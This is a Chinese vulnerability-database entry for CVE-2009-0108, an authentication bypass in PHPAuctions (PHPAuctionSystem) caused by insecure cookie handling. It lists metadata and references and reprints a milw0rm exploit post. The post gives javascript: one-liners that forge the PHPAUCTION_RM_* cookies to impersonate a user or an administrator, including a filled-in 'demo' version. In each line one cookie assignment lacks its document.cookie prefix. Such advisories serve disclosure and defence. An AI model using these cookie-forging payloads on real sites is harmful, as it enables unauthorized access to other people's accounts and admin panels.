PHPAuctions Cookie 身份认证绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117193 漏洞类型 权限许可和访问控制
发布时间 2009-01-05 更新时间 2009-01-29
CVE编号 CVE-2009-0108 CNNVD-ID CNNVD-200901-097
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7674
https://cxsecurity.com/issue/WLB-2009010146
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-097
|漏洞详情
PHPAuctions是一款基于PHP的WEB应用程序。PHPAuctions(又称PHPAuctionSystem)存在权限许可和访问控制漏洞。远程攻击者借助修改过的(1)PHPAUCTION_RM_ID(2)PHPAUCTION_RM_NAME(3)PHPAUCTION_RM_USERNAME(4)PHPAUCTION_RM_EMAILcookies绕过身份认证和获得管理访问权限。
|漏洞EXP
[~] PHPAuctionSystem Insecure Cookie Handling Vuln.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
[~]
[~] Date: 05.01.09
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com 
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

javascript:document.cookie = "PHPAUCTION_RM_ID=[ID]; path=/"; document.cookie = "PHPAUCTION_RM_NAME=[Real_name]; path=/"; document.cookie = "PHPAUCTION_RM_USERNAME=[User_name]; path=/"; "PHPAUCTION_RM_EMAIL=[email]; path=/";

exp for demo: ( username: sallama )

javascript:document.cookie = "PHPAUCTION_RM_ID=47; path=/"; document.cookie = "PHPAUCTION_RM_NAME=salla; path=/"; document.cookie = "PHPAUCTION_RM_USERNAME=sallama; path=/"; "PHPAUCTION_RM_EMAIL=trt-turk%40hotmail.com; path=/";


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com users :)
[~]
[~] yildirimordulari.org  &  experl.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-01-05]
|参考资料

来源:BID
名称:33120
链接:http://www.securityfocus.com/bid/33120
来源:MILW0RM
名称:7674
链接:http://www.milw0rm.com/exploits/7674
来源:SREASON
名称:4891
链接:http://securityreason.com/securityalert/4891
来源:SECUNIA
名称:33331
链接:http://secunia.com/advisories/33331
来源:OSVDB
名称:51146
链接:http://osvdb.org/51146